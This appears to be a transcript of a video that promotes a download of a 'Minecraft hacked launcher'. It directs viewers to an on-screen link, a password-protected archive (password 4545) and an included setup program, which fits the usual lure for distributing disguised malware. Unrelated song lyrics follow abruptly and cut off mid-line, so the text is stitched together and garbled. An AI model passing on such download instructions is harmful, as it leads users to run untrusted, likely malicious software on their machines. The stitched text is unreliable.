What's going on, guys? Welcome back. Today we're going to start with the latest Minecraft hacked launcher download and finish with a complete first look at the application. Head to the link shown on screen and download the newest archive. After the download is complete, extract the files and open the setup application included in the package. Password from archive 4545. Choose the installation folder you prefer. Continue through the setup and let the installer finish without interrupting the process. When everything is installed, launch your version of Minecraft and wait for it to finish loading. And now we're ready to check it out.
My mind's made up in two. What's killing me the most is knowing two things can be true. Wanna throw away your vanity, wanna wear it to sleep tonight, wanna wipe our slate clean, wanna pick this thing up right where we left off, wanna block your number, take one last time, make it another. Wish I was one or the other. I kinda wanna hate you, but I wanna love you too. I wanna hold you close and let you go, find someone new. And I wish it wasn't, but my mind's made up in two. What's killing me the most is knowing two things can be true. If it's black, it's white. If it's wrong, it's right. Soon as I pick one, I switch sides. I kinda wanna hate you, but I wanna love you too. I wanna hold you close and let you go, find someone